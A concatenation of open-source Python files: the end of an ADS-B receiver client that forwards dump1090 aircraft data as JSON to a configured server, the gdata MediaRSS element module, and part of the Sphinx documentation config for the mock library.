logger.log("airSuck client watchdog threw exception:\n%s" %tb)
# Restart our watchdog.
self.__myWatchdog = threading.Timer(1.0, self.__clientWatchdog)
self.__myWatchdog.start()
def __rxWatcher(self):
"""
Handle data recieved from our connected socket.
"""
# Flag the RX watcher as running
self.__rxWatcherRunning = True
# Loop guard
keepRunning = True
# Empty buffer string.
buff = ""
# While we're connected
while keepRunning:
try:
if self.__serverConnected == True:
# Get data.
buff = buff + self.__serverSock.recv(self.__rxBuffSz)
# If we have a newline check of our string and clear the buffer.
if buff.find("\n"):
# If we got our JSON sentence reset the counter.
if buff == self.__keepaliveJSON + "\n":
self.__lastSrvKeepalive = 0
# If we're debugging log the things.
if asConfig['debug']:
logger.log("RX Keepalive: %s" %buff.strip())
# Reset data stuff.
buff = ""
# Attempt to send another keepalive.
self.__send(self.__keepaliveJSON)
except KeyboardInterrupt:
# We don't want to keep running.
keepRunning = False
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
# Pass the exception up the chain.
raise KeyboardInterrupt
except SystemExit:
# We don't want to keep running.
keepRunning = False
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
# pass the system exit exception up the stack.
raise SystemExit
except socket.timeout:
# If we time out do nothing. This is intentional.
None
except Exception as e:
# We don't want to keep running.
keepRunning = False
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
# We probably disconnected.
self.__serverConnected = False
if 'errno' in e:
# If something goes wrong...
if e.errno == 32:
# We expect this to break this way sometimes.
raise IOError
else:
tb = traceback.format_exc()
logger.log("Exception in airSuck client rxWatcher:\n%s" %tb)
def __gpsWorker(self):
"""
This monitors GPSD for new data and updates our class-wide GPS vars.
"""
logger.log("Starting GPS worker...")
# We shouldn't start another GPS worker unless we have an exception.
self.__startGpsWorker = False
# If loading GPS worked...
canHasGps = False
try:
# If we have a gps set it up.
if asConfig['gps']:
self.__gps = gps(mode=WATCH_ENABLE)
# We're up!
canHasGps = True
try:
# Keep doing the things.
while(canHasGps):
# Get the "next" data...
self.__gps.next()
# Set our flag to let the system know we have an initial reading.
self.__gpsdData = True
# If we have an keyboard interrupt or system exit pass it on.
except KeyboardInterrupt:
raise KeyboardInterrupt
except SystemExit:
raise SystemExit
except:
# Whatever else happens we want to log.
tb = traceback.format_exc()
logger.log("GPS worker blew up:\n%s" %tb)
# Dump message and wait 30 sec before clearing the fail flag.
logger.log("GPS worker sleeping 30 sec.")
time.sleep(30.0)
# Now we want to try and start again.
self.__startGpsWorker = True
except:
# Flag the gpsWorker thread as down.
self.__gpsWorkerRunning = False
self.__gpsWorkerFail = True
# Whatever else happens we want to log.
tb = traceback.format_exc()
logger.log("GPS worker blew up trying to activte the GPS:\n%s" %tb)
# Dump message and wait 30 sec before clearing the fail flag.
logger.log("GPS worker sleeping 30 sec.")
time.sleep(30.0)
# Now we want to try and start again.
self.__startGpsWorker = True
def __handleBackoffSrv(self, reset=False):
"""
Handle the backoff algorithm for reconnect delay. Accepts one optional argument, reset which is a boolean value. When reset is true, the backoff value is set back to 1. Returns no data.
"""
# If we're resetting the backoff set it to 1.0.
if reset:
self.__backoffSrv = 1.0
else:
# backoff ^ 2 for each iteration, ending at 4.0.
if self.__backoffSrv == 1.0:
self.__backoffSrv = 2.0
elif self.__backoffSrv == 2.0:
self.__backoffSrv = 4.0
return
def __handleBackoff1090(self, reset=False):
"""
Handle the backoff algorithm for restart delay. Accepts one optional argument, reset which is a boolean value. When reset is true, the backoff value is set back to 1. Returns no data.
"""
# If we're resetting the backoff set it to 1.0.
if reset:
self.__backoff1090 = 1.0
else:
# backoff ^ 2 for each iteration, ending at 4.0.
if self.__backoff1090 == 1.0:
self.__backoff1090 = 2.0
elif self.__backoff1090 == 2.0:
self.__backoff1090 = 4.0
return
def __createBaseJSON(self):
"""
Creates a base JSON dictionary with information generic to all output.
"""
# Get the timestamp data.
dtsStr = str(datetime.datetime.utcnow())
# Create basic JSON dictionary.
retVal = {"clientName": asConfig['myName'], "dataOrigin": "airSuckClient", "dts": dtsStr}
# If we have gps support enabled...
if asConfig['gps']:
try:
# And if we have an initial reading plus a fix...
if self.__gpsdData and (self.__gps.fix.mode > 1):
# Update dictionary with GPS-related data.
retVal.update({"srcLat": self.__gps.fix.latitude, "srcLon": self.__gps.fix.longitude, "srcPosMeta": "gps"})
elif asConfig['reportPos']:
try:
# Update dictionary with GPS-related data.
retVal.update({"srcLat": float(asConfig['myPos'][0]), "srcLon": float(asConfig['myPos'][1]), "srcPosMeta": "manual"})
except:
logger.log("Improperly formatted position data from config.py.")
except:
tb = traceback.format_exc()
logger.log("Failed to get GPS position data:%s" %tb)
else:
# Handle GPS and related config data here.
if asConfig['reportPos']:
try:
# Update dictionary with GPS-related data.
retVal.update({"srcLat": float(asConfig['myPos'][0]), "srcLon": float(asConfig['myPos'][1]), "srcPosMeta": "manual"})
except:
logger.log("Improperly formatted position data from config.py.")
return retVal
def __verifyADSB(self, line):
"""
Verifies the formattting of the potential ADS-B frame. If the incoming data doesn't match the regex the method returns False. If it matches it will return True.
"""
# Assume we don't have good data by default.
retVal = False
# If we get a match...
if self.__re1090.match(line) is not None:
retVal = True
# If we're debugging log the things.
if asConfig['debug']:
logger.log("%s appears to be valid ADS-B." %line.strip())
# And return...
return retVal
def __handleADSB(self, adsb):
"""
Place holder method that should result in the data being JSON wrapped and sent over the network.
"""
# Reset watchdog value.
self.__lastADSB = 0
# Build a dictionary with minimal information to send.
adsbDict = {"type": "airSSR", "data": adsb.strip()}
adsbDict.update(self.__createBaseJSON())
try:
# JSONify the dictionary.
adsbJSON = json.dumps(adsbDict)
except:
tb = traceback.format_exc()
logger.log("Exception occured creating JSON dictionary:\n%s" %tb)
# If we're debugging log the things.
if asConfig['debug']:
logger.log("Enqueue: %s" %adsbJSON)
try:
# Put it on the queue.
clientQ.put(adsbJSON)
except:
tb = traceback.format_exc()
logger.log("dump1090 exception putting data on queue:\n%s" %tb)
return
def __stdoutWorker(self):
"""
Handle STDOUT output from dump1090.
"""
try:
# While we're still running...
while self.__proc1090.poll() is None:
# Grab the current line from STDOUT.
output = self.__proc1090.stdout.readline()
# If we're debugging dump the raw data
if asConfig['debug']:
logger.log("dump1090 stdout: %s" %output.strip())
# If it seems to be valid ADS-B then use it.
if self.__verifyADSB(output):
# If we're debugging...
if asConfig['debug']:
logger.log("Passing %s to __handleADSB." %output.strip())
self.__handleADSB(output)
# Get any 'straggling' output.
output = self.__proc1090.communicate()[0]
# If we're debugging dump the raw data
if asConfig['debug']:
logger.log("dump1090 stdout: %s" %output.strip())
# If it seems to be valid ADS-B then use it.
if self.__verifyADSB(output):
self.__handleADSB(output)
except KeyboardInterrupt:
raise KeyboardInterrupt
except SystemExit:
raise SystemExit
except AttributeError:
# Just die nicely.
pass
except IOError:
# Just die nicely.
None
def __stderrWorker(self):
"""
Handle STDERR output from dump1090.
"""
try:
# While we're still running...
while self.__proc1090.poll() is None:
# Get our STDERR output minus the newline char.
output = self.__proc1090.stderr.readline().replace("\n", "")
# If we're debugging...
if asConfig['debug']:
# If there's something on the line print it.
if output.strip() != "":
logger.log("dump1090 stderr: %s" %output)
# See if there's any data that wasn't picked up by our loop and print it, too.
output = self.__proc1090.communicate()[1].replace("\n", "")
# If we're debugging...
if asConfig['debug']:
if output.strip() != "":
logger.log("dump1090 stderr: %s" %output)
except KeyboardInterrupt:
raise KeyboardInterrupt
except SystemExit:
raise SystemExit
except AttributeError:
# Just die nicely.
pass
except IOError:
# Just die nicely.
None
def __connectServer(self):
"""
Connects to our host.
"""
# Create a new socket object.
self.__serverSock = socket.socket()
# Print message
logger.log("airSuck client connecting to %s:%s..." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Attempt to connect.
try:
# Connect up
self.__serverSock.connect((asConfig['connSrvHost'], asConfig['connSrvPort']))
logger.log("airSuck client connected.")
# We're connected now.
self.__serverConnected = True
# Reset the last keepalive counter.
self.__lastSrvKeepalive = 0
# Reset the watchdog state.
self.__watchdogFail = False
# Reset the backoff value
self.__handleBackoffSrv(True)
# Set 1 second timeout for blocking operations.
self.__serverSock.settimeout(1.0)
# The TX and RX watchdogs should be run every second.
self.__lastSrvKeepalive = 0
except KeyboardInterrupt:
# Pass it up the stack.
raise KeyboardInterrupt
except SystemExit:
# Pass it up the stack.
raise SystemExit
except socket.error, v:
# Connection refused.
if v[0] == errno.ECONNREFUSED:
logger.log("%s:%s refused connection." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Connection refused.
elif v[0] == errno.ECONNRESET:
logger.log("%s:%s reset connection." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Connection timeout.
elif v[0] == errno.ETIMEDOUT:
logger.log("Connection to %s:%s timed out." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# DNS or address error.
elif v[0] == -2:
logger.log("%s:%s DNS resolution failure or invalid address." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Something else happened.
else:
logger.log("%s:%s unhandled socket error: %s (%s)" %(asConfig['connSrvHost'], asConfig['connSrvPort'], v[1], v[0]))
# Set backoff delay.
boDelay = asConfig['reconnectDelay'] * self.__backoffSrv
# In the event our connect fails, try again after the configured delay
logger.log("airSuck client sleeping %s sec." %boDelay)
time.sleep(boDelay)
# Handle backoff.
self.__handleBackoffSrv()
except Exception as e:
# Dafuhq happened!?
tb = traceback.format_exc()
logger.log("airSuck client went boom connecting:\n%s" %tb)
# Set backoff delay.
boDelay = asConfig['reconnectDelay'] * self.__backoffSrv
# In the event our connect fails, try again after the configured delay
logger.log("airSuck client sleeping %s sec." %boDelay)
time.sleep(boDelay)
# Handle backoff.
self.__handleBackoffSrv()
def __disconnectSouce(self):
"""
Disconnect from our host.
"""
logger.log("airSuck client disconnecting.")
# Clear the server connected flag.
self.__serverConnected = False
try:
# Close the connection.
self.__serverSock.close()
except:
tb = traceback.format_exc()
logger.log("airSuck client threw exception disconnecting.\n%s" %tb)
# Reset the last keepalive counter.
self.__lastSrvKeepalive = 0
def __send(self, data):
"""
Sends specified data to the airSuck destination server.
"""
# If we think we're connected try to send the infos. If not, do nothing.
if self.__serverConnected:
try:
# If we're debugging log the things.
if asConfig['debug']:
logger.log("Netsend: %s" %data)
# Send the data to the server.
sendRes = self.__serverSock.send("%s\n" %data)
# If we weren't able to send anything...
if sendRes == 0:
# Cause a small explosion.
raise RuntimeError("Socked failed to send data. The connection is down.")
except:
tb = traceback.format_exc()
logger.log("airSuck client send exception:\n%s" %tb)
# Flag our connection as dead in the event we fail to send.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
def __queueWorker(self):
"""
Sends data on the queue to the remote server.
"""
self.__queueWorkerRunning = True
logger.log("airSuck client queue worker starting...")
while True:
try:
# Grab the JSON put on the queue
someJSON = clientQ.get()
# If we're debugging log the things.
if asConfig['debug']:
logger.log("Dequeue: %s" %someJSON)
# And then send it over the network.
self.__send(someJSON)
except:
tb = traceback.format_exc()
logger.log("airSuck client queue worker caught exception reading from queue:\n%s" %tb)
# Flag the queue worker as down.
self.__queueWorkerRunning = False
def __kill1090(self):
"""
Kill the dump1090 process.
"""
logger.log("Attempting to kill dump1090...")
try:
if self.__proc1090.poll() is None:
self.__proc1090.kill()
logger.log("dump1090 killed.")
except AttributeError:
# The process is already dead.
logger.log("dump1090 not running.")
except:
# Unhandled exception.
tb = traceback.format_exc()
logger.log("Exception thrown while killing dump1090:\n%s" %tb)
# Flag dumpairSuckClient1090 as down.
self.__dump1090Running = False
# Blank the object.
self.__proc1090 = None
def __worker(self):
"""
The main worker method that spins up the dump1090 executable and takes data from stdout.
"""
# We want to keep going.
keepRunning = True
# Start our watchdog process.
self.__myWatchdog = threading.Timer(1.0, self.__clientWatchdog)
self.__myWatchdog.start()
# Make sure we kill dump1090 when we shut down.
atexit.register(self.__kill1090)
# Keep running and restarting dump1090 unless the program is killed.
while keepRunning:
# If we have GPS enabled and there's no reason we shouldn't start it.
if asConfig['gps'] and self.__startGpsWorker:
try:
# Start the GPS worker thread.
gpsWorker = threading.Thread(target=self.__gpsWorker)
gpsWorker.daemon = True
gpsWorker.start()
except KeyboardInterrupt:
# Pass it on...
raise KeyboardInterrupt
except SystemExit:
# Pass it up.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client worker blew up starting the GPS worker:\n%s" %tb)
try:
# If we're supposed to keep running and the server is connected.
if keepRunning and (not self.__serverConnected):
self.__connectServer()
except KeyboardInterrupt:
# Pass it on...
raise KeyboardInterrupt
except SystemExit:
# Pass it up.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client worker blew up:\n%s" %tb)
self.__disconnectSouce()
try:
# If the RX watcher is not running
if (not self.__rxWatcherRunning):
# Start the RX watcher...
rxListener = threading.Thread(target=self.__rxWatcher)
rxListener.daemon = True
rxListener.start()
except KeyboardInterrupt:
# Stop looping.
keepRunning = False
# Flag the RX watcher as not running
self.rxWatcherRunning = False
# Raise the keyboard interrupt.
raise KeyboardInterrupt
except SystemExit:
# Stop looping.
keepRunning = False
# Flag the RX watcher as not running
self.rxWatcherRunning = False
# Pass the exception up the chain to our runner.
raise SystemExit
except:
# Log the exception
tb = traceback.format_exc()
logger.log("airSuck client rxListener blew up:\n%s" %tb)
# Flag the RX watcher as not running
self.rxWatcherRunning = False
try:
# If the queue worker isn't running...
if (not self.__queueWorkerRunning):
# Start our queue worker.
queueThread = threading.Thread(target=self.__queueWorker)
queueThread.daemon = True
queueThread.start()
except KeyboardInterrupt:
# Pass the exception up the chain to our runner.
raise KeyboardInterrupt
except SystemExit:
# Pass the exception up the chain to our runner.
raise SystemExit
except:
# Something else unknown happened.
tb = traceback.format_exc()
logger.log("dump1090 worker threw exception:\n%s" %tb)
try:
# Make sure Dump1090 is supposed to start, and that we're supposed to keep it running.
if (asConfig['dump1090Enabled']) and (not self.__dump1090Running):
# We have don't have dump1090 started.
if self.__proc1090 == None:
# Start dump1090.
self.__proc1090 = Popen(self.popenCmd, stdout=PIPE, stderr=PIPE)
# If we have dump1090 working
if self.__proc1090 is not None:
logger.log("dump1090 started with PID %s." %self.__proc1090.pid)
# Flag dump1090 as runningo.
self.__dump1090Running = True
# Reset the backoff since we manged to start.
self.__handleBackoff1090(True)
# Start the watchdog after resetting lastADSB.
self.__lastADSB = 0
# Set up some threads to listen to the dump1090 output.
stdErrListener = threading.Thread(target=self.__stderrWorker)
stdOutListener = threading.Thread(target=self.__stdoutWorker)
stdErrListener.daemon = True
stdOutListener.daemon = True
stdErrListener.start()
stdOutListener.start()
# If we intend to restart dump1090 and we didn't kill dump1090 because of the watchdog...
if (not self.__dump1090Running) and (not self.__watchdog1090Restart):
# Handle backoff algorithm before it restarts.
boDly = self.__backoff1090 * asConfig['dump1090Delay']
logger.log("dump1090 sleeping %s sec before restart." %boDly)
time.sleep(boDly)
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Run the backoff handler.
self.__handleBackoff1090()
except KeyboardInterrupt:
# We don't want to keep running since we were killed.
keepRunning = False
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Pass the exception up the chain to our runner.
raise KeyboardInterrupt
except SystemExit:
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Raise the exception again.
raise SystemExit
except OSError:
# Dump an error since the OS reported dump1090 can't run.
logger.log("Unable to start dump1090. Please ensure dump1090 is at %s." %asConfig['dump1090Path'])
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Flag the thread for death.
keepRunning = False
# Attempt to kill dump1090
self.__kill1090()
except:
# Something else unknown happened.
tb = traceback.format_exc()
logger.log("dump1090 worker threw exception:\n%s" %tb)
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Attempt to kill dump1090
self.__kill1090()
try:
# Wait 0.1 seconds before looping.
time.sleep(0.1)
except KeyboardInterrupt:
# We don't want to keep running since we were killed.
keepRunning = False
# Raise the exception again.
raise KeyboardInterrupt
except SystemExit:
# We don't want to keep running since we were killed.
keepRunning = False
# Raise the exception again.
raise SystemExit
def __exitHandler(self, x=None, y=None):
"""
When we're instructed to exit these are the things we should do.
"""
logger.log("Caught signal that wants us to die.")
try:
# Try to kill dump1090.
self.__kill1090()
except:
pass
# Raise this exception to kill the program nicely.
sys.exit(0)
def run(self):
logger.log("Starting dump1090 worker.")
# NOTE:
# Since dump1090 has a bad habit of not dying unless we implement signal
# handlers for signals that result in the death of the client.
try:
signal.signal(signal.SIGTERM, self.__exitHandler)
except:
tb = traceback.format_exc()
logger.log("Death signal handler blew up setting signal handlers:\n%s" %tb)
try:
# Attempt to start the worker.
self.__worker()
except KeyboardInterrupt:
# Make damn sure dump1090 is dead.
try:
self.__kill1090()
except:
pass
# Pass the keyboard interrupt up the chain to our main execution
raise KeyboardInterrupt
except SystemExit:
# Make damn sure dump1090 is dead.
try:
self.__kill1090()
except:
pass
# Pass the exception up the stack.
raise SystemExit
except Exception as e:
# Make damn sure dump1090 is dead.
try:
self.__kill1090()
except:
pass
# Pass the exception up the stack.
raise e
#######################
# Main execution body #
#######################
if __name__ == "__main__":
# Set up our global logger.
logger = asLog(asConfig['logMode'])
# Log startup message.
logger.log("Starting the airSuck client...")
# If we're debugging...
if asConfig['debug']:
# Dump our config.
logger.log("Configuration:\n%s" %asConfig)
# Set up our global objects.
asc = airSuckClient()
clientQ = Queue.Queue()
# Do we have at least one data source configured?
noDS = True
try:
# If we are configured to run the dump1090 client add it to our thread list.
if asConfig['dump1090Enabled']:
# Set the data source config flag.
noDS = False
# If we are configured to run the dump1090 client add it to our thread list.
if asConfig['aisEnabled']:
# Set the data source config flag.
noDS = False
# Start our comms thread.
threadClient = threading.Thread(target=asc.run())
threadClient.daemon = True
threadClient.start()
# If we didn't have a configured data source dump a helpful message.
if noDS:
logger.log("No data sources enabled for the airSuck client. Please enable at least one source in config.py by setting dump1090Enabled and/or aisEnabled to True.")
except KeyboardInterrupt:
logger.log("Keyboard interrupt.")
except SystemExit:
logger.log("System exit.")
except:
tb = traceback.format_exc()
logger.log("Unhandled exception in airSuck client:\n%s" %tb)
logger.log("Shutting down the airSuck client.") | gpl-3.0 |
bhargav2408/python-for-android | python-build/python-libs/gdata/src/gdata/media/__init__.py | 221 | 12093 | # -*-*- encoding: utf-8 -*-*-
#
# This is gdata.photos.media, implementing parts of the MediaRSS spec in gdata structures
#
# $Id: __init__.py 81 2007-10-03 14:41:42Z havard.gulldahl $
#
# Copyright 2007 Håvard Gulldahl
# Portions copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Essential attributes of photos in Google Photos/Picasa Web Albums are
expressed using elements from the `media' namespace, defined in the
MediaRSS specification[1].
Due to copyright issues, the elements herein are documented sparingly, please
consult with the Google Photos API Reference Guide[2], alternatively the
official MediaRSS specification[1] for details.
(If there is a version conflict between the two sources, stick to the
Google Photos API).
[1]: http://search.yahoo.com/mrss (version 1.1.1)
[2]: http://code.google.com/apis/picasaweb/reference.html#media_reference
Keep in mind that Google Photos only uses a subset of the MediaRSS elements
(and some of the attributes are trimmed down, too):
media:content
media:credit
media:description
media:group
media:keywords
media:thumbnail
media:title
"""
__author__ = u'[email protected]'# (Håvard Gulldahl)' #BUG: api chokes on non-ascii chars in __author__
__license__ = 'Apache License v2'
import atom
import gdata
MEDIA_NAMESPACE = 'http://search.yahoo.com/mrss/'
YOUTUBE_NAMESPACE = 'http://gdata.youtube.com/schemas/2007'
class MediaBaseElement(atom.AtomBase):
"""Base class for elements in the MEDIA_NAMESPACE.
To add new elements, you only need to add the element tag name to self._tag
"""
_tag = ''
_namespace = MEDIA_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
def __init__(self, name=None, extension_elements=None,
extension_attributes=None, text=None):
self.name = name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class Content(MediaBaseElement):
"""(attribute container) This element describes the original content,
e.g. an image or a video. There may be multiple Content elements
in a media:Group.
For example, a video may have a
<media:content medium="image"> element that specifies a JPEG
representation of the video, and a <media:content medium="video">
element that specifies the URL of the video itself.
Attributes:
url: non-ambigous reference to online object
width: width of the object frame, in pixels
height: width of the object frame, in pixels
medium: one of `image' or `video', allowing the api user to quickly
determine the object's type
type: Internet media Type[1] (a.k.a. mime type) of the object -- a more
verbose way of determining the media type. To set the type member
in the contructor, use the content_type parameter.
(optional) fileSize: the size of the object, in bytes
[1]: http://en.wikipedia.org/wiki/Internet_media_type
"""
_tag = 'content'
_attributes = atom.AtomBase._attributes.copy()
_attributes['url'] = 'url'
_attributes['width'] = 'width'
_attributes['height'] = 'height'
_attributes['medium'] = 'medium'
_attributes['type'] = 'type'
_attributes['fileSize'] = 'fileSize'
def __init__(self, url=None, width=None, height=None,
medium=None, content_type=None, fileSize=None, format=None,
extension_elements=None, extension_attributes=None, text=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.url = url
self.width = width
self.height = height
self.medium = medium
self.type = content_type
self.fileSize = fileSize
def ContentFromString(xml_string):
return atom.CreateClassFromXMLString(Content, xml_string)
class Credit(MediaBaseElement):
"""(string) Contains the nickname of the user who created the content,
e.g. `Liz Bennet'.
This is a user-specified value that should be used when referring to
the user by name.
Note that none of the attributes from the MediaRSS spec are supported.
"""
_tag = 'credit'
def CreditFromString(xml_string):
return atom.CreateClassFromXMLString(Credit, xml_string)
class Description(MediaBaseElement):
"""(string) A description of the media object.
Either plain unicode text, or entity-encoded html (look at the `type'
attribute).
E.g `A set of photographs I took while vacationing in Italy.'
For `api' projections, the description is in plain text;
for `base' projections, the description is in HTML.
Attributes:
type: either `text' or `html'. To set the type member in the contructor,
use the description_type parameter.
"""
_tag = 'description'
_attributes = atom.AtomBase._attributes.copy()
_attributes['type'] = 'type'
def __init__(self, description_type=None,
extension_elements=None, extension_attributes=None, text=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.type = description_type
def DescriptionFromString(xml_string):
return atom.CreateClassFromXMLString(Description, xml_string)
class Keywords(MediaBaseElement):
"""(string) Lists the tags associated with the entry,
e.g `italy, vacation, sunset'.
Contains a comma-separated list of tags that have been added to the photo, or
all tags that have been added to photos in the album.
"""
_tag = 'keywords'
def KeywordsFromString(xml_string):
return atom.CreateClassFromXMLString(Keywords, xml_string)
class Thumbnail(MediaBaseElement):
"""(attributes) Contains the URL of a thumbnail of a photo or album cover.
There can be multiple <media:thumbnail> elements for a given <media:group>;
for example, a given item may have multiple thumbnails at different sizes.
Photos generally have two thumbnails at different sizes;
albums generally have one cropped thumbnail.
If the thumbsize parameter is set to the initial query, this element points
to thumbnails of the requested sizes; otherwise the thumbnails are the
default thumbnail size.
This element must not be confused with the <gphoto:thumbnail> element.
Attributes:
url: The URL of the thumbnail image.
height: The height of the thumbnail image, in pixels.
width: The width of the thumbnail image, in pixels.
"""
_tag = 'thumbnail'
_attributes = atom.AtomBase._attributes.copy()
_attributes['url'] = 'url'
_attributes['width'] = 'width'
_attributes['height'] = 'height'
def __init__(self, url=None, width=None, height=None,
extension_attributes=None, text=None, extension_elements=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.url = url
self.width = width
self.height = height
def ThumbnailFromString(xml_string):
return atom.CreateClassFromXMLString(Thumbnail, xml_string)
class Title(MediaBaseElement):
"""(string) Contains the title of the entry's media content, in plain text.
Attributes:
type: Always set to plain. To set the type member in the constructor, use
the title_type parameter.
"""
_tag = 'title'
_attributes = atom.AtomBase._attributes.copy()
_attributes['type'] = 'type'
def __init__(self, title_type=None,
extension_attributes=None, text=None, extension_elements=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.type = title_type
def TitleFromString(xml_string):
return atom.CreateClassFromXMLString(Title, xml_string)
class Player(MediaBaseElement):
"""(string) Contains the embeddable player URL for the entry's media content
if the media is a video.
Attributes:
url: Always set to plain
"""
_tag = 'player'
_attributes = atom.AtomBase._attributes.copy()
_attributes['url'] = 'url'
def __init__(self, player_url=None,
extension_attributes=None, extension_elements=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.url= player_url
class Private(atom.AtomBase):
"""The YouTube Private element"""
_tag = 'private'
_namespace = YOUTUBE_NAMESPACE
class Duration(atom.AtomBase):
"""The YouTube Duration element"""
_tag = 'duration'
_namespace = YOUTUBE_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['seconds'] = 'seconds'
class Category(MediaBaseElement):
"""The mediagroup:category element"""
_tag = 'category'
_attributes = atom.AtomBase._attributes.copy()
_attributes['term'] = 'term'
_attributes['scheme'] = 'scheme'
_attributes['label'] = 'label'
def __init__(self, term=None, scheme=None, label=None, text=None,
extension_elements=None, extension_attributes=None):
"""Constructor for Category
Args:
term: str
scheme: str
label: str
text: str The text data in the this element
extension_elements: list A list of ExtensionElement instances
extension_attributes: dict A dictionary of attribute value string pairs
"""
self.term = term
self.scheme = scheme
self.label = label
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class Group(MediaBaseElement):
"""Container element for all media elements.
The <media:group> element can appear as a child of an album, photo or
video entry."""
_tag = 'group'
_children = atom.AtomBase._children.copy()
_children['{%s}content' % MEDIA_NAMESPACE] = ('content', [Content,])
_children['{%s}credit' % MEDIA_NAMESPACE] = ('credit', Credit)
_children['{%s}description' % MEDIA_NAMESPACE] = ('description', Description)
_children['{%s}keywords' % MEDIA_NAMESPACE] = ('keywords', Keywords)
_children['{%s}thumbnail' % MEDIA_NAMESPACE] = ('thumbnail', [Thumbnail,])
_children['{%s}title' % MEDIA_NAMESPACE] = ('title', Title)
_children['{%s}category' % MEDIA_NAMESPACE] = ('category', [Category,])
_children['{%s}duration' % YOUTUBE_NAMESPACE] = ('duration', Duration)
_children['{%s}private' % YOUTUBE_NAMESPACE] = ('private', Private)
_children['{%s}player' % MEDIA_NAMESPACE] = ('player', Player)
def __init__(self, content=None, credit=None, description=None, keywords=None,
thumbnail=None, title=None, duration=None, private=None,
category=None, player=None, extension_elements=None,
extension_attributes=None, text=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.content=content
self.credit=credit
self.description=description
self.keywords=keywords
self.thumbnail=thumbnail or []
self.title=title
self.duration=duration
self.private=private
self.category=category or []
self.player=player
def GroupFromString(xml_string):
return atom.CreateClassFromXMLString(Group, xml_string)
| apache-2.0 |
mikelalcon/bazel | third_party/py/mock/docs/conf.py | 108 | 6310 | # -*- coding: utf-8 -*-
#
# Mock documentation build configuration file, created by
# sphinx-quickstart on Mon Nov 17 18:12:00 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
sys.path.insert(0, os.path.abspath('..'))
from mock import __version__
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.doctest']
doctest_global_setup = """
import os
import sys
import mock
from mock import * # yeah, I know :-/
import unittest2
import __main__
if os.getcwd() not in sys.path:
sys.path.append(os.getcwd())
# keep a reference to __main__
sys.modules['__main'] = __main__
class ProxyModule(object):
def __init__(self):
self.__dict__ = globals()
sys.modules['__main__'] = ProxyModule()
"""
doctest_global_cleanup = """
sys.modules['__main__'] = sys.modules['__main']
"""
html_theme = 'nature'
html_theme_options = {}
# Add any paths that contain templates here, relative to this directory.
#templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = u'Mock'
copyright = u'2007-2012, Michael Foord & the mock team'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = __version__[:3]
# The full version, including alpha/beta/rc tags.
release = __version__
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'friendly'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
#html_style = 'adctheme.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
